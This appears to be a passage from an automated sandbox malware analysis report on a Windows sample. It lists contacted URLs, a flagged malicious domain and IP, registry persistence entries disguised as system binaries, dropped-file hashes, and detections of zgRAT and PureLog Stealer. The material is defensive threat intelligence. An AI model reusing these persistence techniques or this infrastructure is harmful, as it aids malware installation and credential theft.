                                                                                      http://www.voidtools.com/everything/beta-update.iniMozilla/5.0drivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                        https://www.voidtools.com/downloads/bEverything.exe, 00000006.00000003.2222673709.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222133131.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2240665516.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          http://www.voidtools.com/everything/update.inidrivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222077239.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229925355.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2229823075.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229585702.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000003.2221177245.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            https://www.voidtools.com/update/)InternetReadFileInternetOpenUrlWInternetCloseHandleInternetOpenWwidrivEn760.exe, 00000003.00000002.2322582469.0000000002726000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2221996305.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000006.00000000.2219670131.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmp, Everything.exe, 00000007.00000000.2224034477.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000007.00000002.2228700188.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 00000008.00000000.2226818799.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000002.2246706702.00007FF728D60000.00000002.00000001.01000000.00000010.sdmp, Everything.exe, 0000000A.00000000.2244353758.00007FF728D60000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                              http://support.voidtools.com/everything/Search_syntaxBEverything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245716930.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                https://aka.ms/pscore68powershell.exe, 0000001E.00000002.2781172333.000002D005B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2707000759.0000014E00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001E.00000002.2781172333.000002D005B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2707000759.0000014E00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePUvcontainerwebruntime.exe, 0000000E.00000002.2445359948.0000000002E3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      http://support.voidtools.com/everything/Command_line_optionsEverything.exe, 00000006.00000003.2222673709.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2222133131.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 00000006.00000003.2229536980.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245768952.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245528465.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245830909.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, Everything.exe, 0000000A.00000003.2245320628.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        http://www.voidtools.comdrivEn760.exe, 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, Everything.exe, 00000006.00000003.2222077239.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.21.112.1
                                                                                                          838596cm.nyafka.topUnited States
                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                          IP
                                                                                                          127.0.0.1
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1586066
                                                                                                          Start date and time:2025-01-08 17:11:13 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 14m 26s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:82
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:wxl1r0lntg.exe
                                                                                                          renamed because original name is a hash value
                                                                                                          Original Sample Name:55672946ffc3fa0b0c7670bf37d45225.exe
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@116/168@1/2
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 45.5%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 53%
                                                                                                          • Number of executed functions: 190
                                                                                                          • Number of non-executed functions: 200
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .exe
                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 20.109.210.53, 13.107.246.45, 172.202.163.200
                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target Everything.exe, PID 7868 because it is empty
                                                                                                          • Execution Graph export aborted for target KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, PID 8980 because it is empty
                                                                                                          • Execution Graph export aborted for target KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, PID 9188 because it is empty
                                                                                                          • Execution Graph export aborted for target containerwebruntime.exe, PID 2300 because it is empty
                                                                                                          • Execution Graph export aborted for target sihost.exe, PID 9088 because it is empty
                                                                                                          • Execution Graph export aborted for target wxl1r0lntg.exe, PID 6156 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: wxl1r0lntg.exe
                                                                                                          TimeTypeDescription
                                                                                                          11:12:41API Interceptor405x Sleep call for process: powershell.exe modified
                                                                                                          11:12:50API Interceptor3x Sleep call for process: Everything.exe modified
                                                                                                          11:12:56API Interceptor257009x Sleep call for process: KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe modified
                                                                                                          11:12:57API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                          17:12:25AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Everything "C:\Program Files\Everything\Everything.exe" -startup
                                                                                                          17:12:37AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          17:12:50AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Windows\apppatch\CustomSDB\sihost.exe"
                                                                                                          17:13:03AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                                                                                                          17:13:13AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run containerwebruntime "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe"
                                                                                                          17:13:29AutostartRun: WinLogon Shell "C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          17:13:38AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          17:13:46AutostartRun: WinLogon Shell "C:\Windows\apppatch\CustomSDB\sihost.exe"
                                                                                                          17:13:54AutostartRun: WinLogon Shell "C:\Recovery\RuntimeBroker.exe"
                                                                                                          17:14:03AutostartRun: WinLogon Shell "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          17:14:11AutostartRun: WinLogon Shell "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe"
                                                                                                          17:14:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          17:14:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Windows\apppatch\CustomSDB\sihost.exe"
                                                                                                          17:14:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
                                                                                                          17:14:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run containerwebruntime "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe"
                                                                                                          17:14:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          No context
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          File Type:MSVC .res
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1168
                                                                                                          Entropy (8bit):4.448520842480604
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                                          MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                                          SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                                          SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                                          SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4608
                                                                                                          Entropy (8bit):3.925840861116531
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6cmNtWxZ8RxeOAkFJOcV4MKe28dR6lfvqBHnuulB+hnqXSfbNtm:2pxvxVx9xYvkZTkZzNt
                                                                                                          MD5:39BAA77C566C3B3FFB11A6EA268879C2
                                                                                                          SHA1:0CD291E68183743ADC0B1A9752191B7F653F4EA3
                                                                                                          SHA-256:9645DEBBEB7E0157307E5FF76A2AD261A0C1F4310C3AB365A69E8AFEFF95FEE8
                                                                                                          SHA-512:8DBB1AD0C8016F7906884A6C7D996A139B9599FC957536BCFEC00E5701CDBBD75A5B129A7D540EDF284FB3E50460E945DDA5CC11ED8569D0E4ECA65B4B66C1EB
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~g.............................'... ...@....@.. ....................................@.................................d'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..<.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with very long lines (610), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):610
                                                                                                          Entropy (8bit):5.869480860892324
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:axCik7OJB1caL9Ru2TKpkUV/+YzRCsbkR23OUqniYYYwDqA:KrxcaL9RvTckUVmYl1bzunu5
                                                                                                          MD5:EC6FE0B161EBA8D4F3172155DAC478F8
                                                                                                          SHA1:3EFD2495DA01C99832DFAD1A70C32FD78CD556F4
                                                                                                          SHA-256:3AAD1DB624B67C363721AE4AC9606BFCA1867C934D9A9802207F14B51DD4D89D
                                                                                                          SHA-512:9AA424DF5270DCE3D90D41400D195A8450DDD1CD43DC441698265829E6AA8ABBBA32FB6A052A01B8FFF58CED0A56D9BC8BEBC98A8011AD17AF77039058658395
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:NKaqjRKm90hUDkM9Arhg1MS6duFr9fHXhKozL9IKDKEBzqhWZIShjQtA2dMyMcndsJw26XxBjXcrIQHwMtR1NkyRan7swT8lhlTp4oaCUQ8LxC2lValcKwPHUecSZEPPZ1Jg7c1iSPg6mmeXvWXVsfavVLUaMHnQBtw52Vo2iDJ5PTfs9EgCq3h3bYLvHbWLlQ42zjeasfxoVefBpmaHlkjHM3deJ2vGr8T9Ym2akGULG2i72JFfBOkBqxq6FAQztq6WKfnDt9hePXATUglAxQFcYSSl66Vj0eca6LwXgCvBrFvTwXliYQCdke72NBHxn7ou5kXJuOdueEuTg8ziUxLkc8zbO3Jf58XubAYLAcxJwS9gtoWOMic0vES6u541E8zgqA1fkni29BxJ9Tsjh5SWfh8XrbbEh6Fycczsw1njAk0uQJ7aMVUJpcAJBexILdUD69rgeAwqRtW5qOGieA2Mm5IAcqqSDfXhPxxRba6Min16GEcxXOnLkHaA0qDxTemwVzp2azGEDqo8EL3XN35z1L6HXwavWJ2DBElRYjWiHjI4dc5pxqjZix4J3ifnYVr4xk69jm8ohXrSDBo41v8qjdfOJbY0Es
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2025984
                                                                                                          Entropy (8bit):7.5739640210308465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xq9/4rTuPInOgODSegbQddnpKSVVvncFn8:xGPIr1UDhv
                                                                                                          MD5:77967721CE1C8B3F0EB800BD33527897
                                                                                                          SHA1:6CACE6DB7C38EC0F438B9D7A2A323A90E703A904
                                                                                                          SHA-256:524FDB6F99BA45BA54D3445BFFB08D32F63E0642516DA16D4B31B8BA22325BD7
                                                                                                          SHA-512:5C0C90952462704C879125EBF9102796608DD7D8722F84183706BCB4748057ED23894E00F1D6B078AB8D8E7089B818CF9FDE7090302E83B5D0431418EC833165
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.qg................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......L...|..............7............................................0..........(.... ........8........E....)...=.......*...8$...(.... ....~....{....:....& ....8....*(.... ........8....(.... ....~....{....:....& ....8........0.......... ........8........E........f...1...v...Z...8........~....(T...~....(X... ....?>... ....8....~....:*... ....~....{....:....& ....8....r...ps....z*...... ....8q...~....(L... .... .... ....s....~....(P....... ....~....{....:1...& ....8&.....(.
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          File Type:MSVC .res
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1184
                                                                                                          Entropy (8bit):4.450344947631575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:WpxjkuZhNUGQBXPNnqNdt4+lEbNFjMyi07:yuulUGQBFqTSfbNtme
                                                                                                          MD5:C995DF11577A12CD2D5381BE331D8B25
                                                                                                          SHA1:47BA90C29B3E22DF9C3F89D5BC71C11DFBE8DD95
                                                                                                          SHA-256:23854C88E9276185040FF39939D2200027963DDB097EB2F54EA861005A9D240B
                                                                                                          SHA-512:2B6F4B29B89332ECE46C1496DD5259CD1243D25CC82BFCF1B51DB1AA3C228DD47BFFC8ED89E85115E9BF3B19EE38EB916E7A8BD0094E6A24FF72603395E136F8
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.... ...........................T...<...............0...........T.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...@.....I.n.t.e.r.n.a.l.N.a.m.e...E.v.e.r.y.t.h.i.n.g...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...H.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...E.v.e.r.y.t.h.i.n.g...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="u
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19402
                                                                                                          Entropy (8bit):4.6448111269020655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Z2dVpOQCtRjkp+cF1W2WLg4xGJ4UytZpjMUFQQ5NverB35+:WVpO5FkocF5V48J4UytZpj1FPBkB35+
                                                                                                          MD5:1EBB92AC516DB5077A0C851565B7A2CF
                                                                                                          SHA1:9ADABFBB11B070169429FD43A250285EE8881213
                                                                                                          SHA-256:E64B60048B375F0C7D4C1FB4329957A297F2E60C306EF9C380175EA7A42223D6
                                                                                                          SHA-512:3FBA14D13A602937B8600C7D5CC8011F7369857BE288510B142573E411B2296CDB3CE58BEAFDF268D04AA1C5130503A63BA38F87239FC7B0BE2E0170BDFC86DE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:Wednesday, 10 May 2023: Version 1.4.1.1023...fixed a security issue with the HTTP server....fixed an issue with empty EFU items.....Monday, 10 October 2022: Version 1.4.1.1022...fixed a crash when loading a preview failed.....Monday, 3 October 2022: Version 1.4.1.1021...fixed a security issue with using an insecure http connection to check for updates....fixed an issue with preventing devices from being safely removed.....Thursday, 8 September 2022: Version 1.4.1.1020...updated localization....fixed a security issue with using an insecure http connection to open the download page.....Wednesday, 17 August 2022: Version 1.4.1.1018...fixed an issue with the MSI installer and removing previous versions.....Friday, 20 May 2022: Version 1.4.1.1017...updated localization....fixed an issue with incrementing search history count when opening a bookmark.....Friday, 17 December 2021: Version 1.4.1.1015...fixed an encoding issue with translations.....Thursday, 16 December 2021: Version 1.4.1.1014.
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4608
                                                                                                          Entropy (8bit):3.913938333713713
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6q2LtBRYo8sau6FJ3ecV4MKe2ud5g6l2vqBHzuulUGQBFqXSfbNtm:SyVx9mrvkFzQdzNt
                                                                                                          MD5:0E5995C0475E4E57F7A6B3FA6E790ABD
                                                                                                          SHA1:5804E9C22581865D81B262EF0A6D198168F551D9
                                                                                                          SHA-256:3B9ED4FC358220EF4376A5A018B5B6AC5EB92F424C6FBCDE2246B7A0E0F0C240
                                                                                                          SHA-512:BE94AAE7432231E57A96963C3494935CD2FC47E47FC7EAC3B89C487A189689505DD562DE69C720CDCC39567F993B96EEB2E4DF3B56F08BC8BF6E88098D1FF91B
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~g.............................'... ...@....@.. ....................................@.................................H'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!.. .............................................................(....*.0..!.......r...pr_..p.{....(....(....&..&..*....................0..........rc..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings.... .......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4608
                                                                                                          Entropy (8bit):3.913938333713713
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6q2LtBRYo8sau6FJ3ecV4MKe2ud5g6l2vqBHzuulUGQBFqXSfbNtm:SyVx9mrvkFzQdzNt
                                                                                                          MD5:0E5995C0475E4E57F7A6B3FA6E790ABD
                                                                                                          SHA1:5804E9C22581865D81B262EF0A6D198168F551D9
                                                                                                          SHA-256:3B9ED4FC358220EF4376A5A018B5B6AC5EB92F424C6FBCDE2246B7A0E0F0C240
                                                                                                          SHA-512:BE94AAE7432231E57A96963C3494935CD2FC47E47FC7EAC3B89C487A189689505DD562DE69C720CDCC39567F993B96EEB2E4DF3B56F08BC8BF6E88098D1FF91B
                                                                                                          Malicious:true
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~g.............................'... ...@....@.. ....................................@.................................H'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!.. .............................................................(....*.0..!.......r...pr_..p.{....(....(....&..&..*....................0..........rc..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings.... .......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                                          Process:C:\Program Files\Everything\Everything.exe
